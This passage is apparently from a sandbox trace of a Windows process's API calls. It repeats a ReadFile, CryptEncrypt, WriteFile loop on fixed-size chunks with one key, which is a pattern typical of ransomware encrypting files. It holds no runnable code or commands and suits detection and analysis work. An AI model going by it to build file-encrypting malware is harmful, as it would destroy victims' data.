hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.781] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.781] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.781] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.782] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.782] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.782] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.782] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.782] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.782] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.782] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.782] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.782] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.782] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.782] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.782] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.782] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.783] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.783] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.783] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.783] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.783] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.785] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.785] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.785] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.785] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.785] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.785] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.785] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.786] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.786] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.786] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.786] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.786] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.786] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.786] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.786] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.786] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.786] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.786] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.786] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.786] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.786] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.787] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.787] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.787] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.787] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.787] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.787] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.787] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.787] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.787] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.787] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.787] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.787] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.787] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.787] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.787] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.788] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.788] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.788] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.788] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.788] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.788] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.788] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.788] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.788] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.788] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.788] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.788] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.788] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.788] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.788] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.789] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.789] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.789] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.789] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.789] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.789] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.789] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.789] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.789] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.789] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.789] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.789] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.789] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.789] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.789] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.789] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.790] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.790] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.790] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.790] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.790] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.790] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.790] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.790] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.790] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.790] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.790] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.790] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.790] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.790] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, 